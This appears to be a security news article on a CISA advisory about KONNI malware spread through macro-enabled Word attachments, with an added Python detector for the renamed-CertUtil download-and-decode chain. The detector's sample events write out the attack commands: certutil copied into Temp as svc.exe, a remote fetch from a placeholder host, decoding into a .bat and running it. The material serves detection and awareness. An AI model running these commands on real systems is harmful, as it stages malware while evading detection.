The Cybersecurity and Infrastructure Security Agency
(CISA) advised users to be wary of an email attachment containing a malicious Microsoft
Word document that’s used to deploy KONNI malware.
Phishing is one of the main methods hackers use to spread
malware, and there’s a solid reason for that. It doesn’t require technical
expertise to infiltrate networks or to compromise security systems. Careless or
untrained employees will do the work of hackers when they open an email without
double-checking where it comes from.
Phishing emails usually try to trick users into visiting a
website that closely imitates the official one, so that the attackers can steal their
credentials. In some cases, the simple act of visiting a website can compromise
a device or PC, if it’s vulnerable. Phishing emails also carry infected attachments,
and Word documents are among the most common.
Microsoft Word’s macro automation features have legitimate
uses, but bad actors can use them to run commands and
install further payloads, all invisible to the user.
“Once the Visual Basic Application (VBA) macro constructs
the command line, it uses the certificate database tool CertUtil to download
remote files from a given Uniform Resource Locator,” says CISA in the advisory.
“It also incorporates a built-in function to decode base64-encoded files. The
Command Prompt silently copies certutil.exe into a temp directory and renames
it to evade detection.”
“The cyber actor then downloads a text file from a remote
resource containing a base64-encoded string that is decoded by CertUtil and
saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file
from the temp directory and executes the .BAT file.”
The result is the final installation of KONNI, a remote
administration tool that hackers use to steal files, infect other hosts in the
same network, take screenshots, capture keystrokes and more.
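The chain CISA describes above (a copy of certutil.exe renamed into a temp directory, used to download a file and base64-decode it into a .BAT that is then executed) leaves a handful of signals in process-creation telemetry. The following detection logic is an added example written for this article, not code from CISA or from the advisory. It assumes records in the shape of Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage); the point of using OriginalFileName is that it comes from the executable’s version resource and therefore survives renaming on disk. The sample events, the user path, the `svc.exe` name and the `example.invalid` URL are all constructed for the example.

```python
"""Flag the renamed-CertUtil download/decode pattern in process-creation events.

Added example for this article; not from the CISA advisory. Field names follow
Sysmon Event ID 1 (process creation). All sample events below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str               # full path of the started process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str        # full path of the parent process


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# A path component named Temp or Tmp anywhere in the image path.
TEMP_PATH_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
# CertUtil switches used to fetch a remote file or base64-decode a local one.
CERTUTIL_FLAG_RE = re.compile(r"(?:^|\s)-(urlcache|decode)\b", re.IGNORECASE)
# A shell copying certutil.exe somewhere (the staging step in the advisory).
SHELL_COPIES_CERTUTIL_RE = re.compile(r"\bcopy\b.*certutil\.exe", re.IGNORECASE)
# A .bat file under a temp directory being run by cmd.exe.
BAT_IN_TEMP_RE = re.compile(r'\\(temp|tmp)\\[^\s"]+\.bat\b', re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: ProcessEvent) -> list[str]:
    """Return the detection labels that apply to a single event (empty if none)."""
    findings: list[str] = []
    image = _basename(event.image)
    parent = _basename(event.parent_image)
    # OriginalFileName identifies CertUtil even when the file on disk was renamed.
    is_certutil = event.original_file_name.lower() == "certutil.exe"

    if is_certutil and image != "certutil.exe":
        findings.append("certutil_renamed")
    if is_certutil and TEMP_PATH_RE.search(event.image):
        findings.append("certutil_in_temp")
    if is_certutil and CERTUTIL_FLAG_RE.search(event.command_line):
        findings.append("certutil_download_or_decode")
    if image in SHELLS and parent in OFFICE_APPS:
        findings.append("office_spawned_shell")
    if image in SHELLS and SHELL_COPIES_CERTUTIL_RE.search(event.command_line):
        findings.append("shell_copies_certutil")
    if image == "cmd.exe" and BAT_IN_TEMP_RE.search(event.command_line):
        findings.append("bat_executed_from_temp")
    return findings


def scan(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, findings) for every event that triggered at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]


# Constructed sample telemetry: one benign CertUtil use, then the advisory's chain.
TEMP = r"C:\Users\u\AppData\Local\Temp"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
                 "certutil.exe -verify cert.cer", CMD),
    ProcessEvent(CMD, "Cmd.Exe",
                 r"cmd.exe /c copy C:\Windows\System32\certutil.exe " + TEMP + r"\svc.exe",
                 WINWORD),
    ProcessEvent(TEMP + r"\svc.exe", "CertUtil.exe",
                 "svc.exe -urlcache -f http://example.invalid/p.txt " + TEMP + r"\p.txt",
                 CMD),
    ProcessEvent(TEMP + r"\svc.exe", "CertUtil.exe",
                 "svc.exe -decode " + TEMP + r"\p.txt " + TEMP + r"\run.bat", CMD),
    ProcessEvent(CMD, "Cmd.Exe", "cmd.exe /c " + TEMP + r"\run.bat", CMD),
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index].command_line, "->", ", ".join(findings))
```

The benign first event produces no finding, while each step of the described chain trips at least one rule; in practice the `certutil_renamed` and `office_spawned_shell` labels are the highest-signal ones, since neither has a routine business reason to occur on a workstation.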
The best way to protect against this type of attack is to
have a security solution installed and kept up to date, to never open attachments
from unknown sources, and to keep macros disabled by default.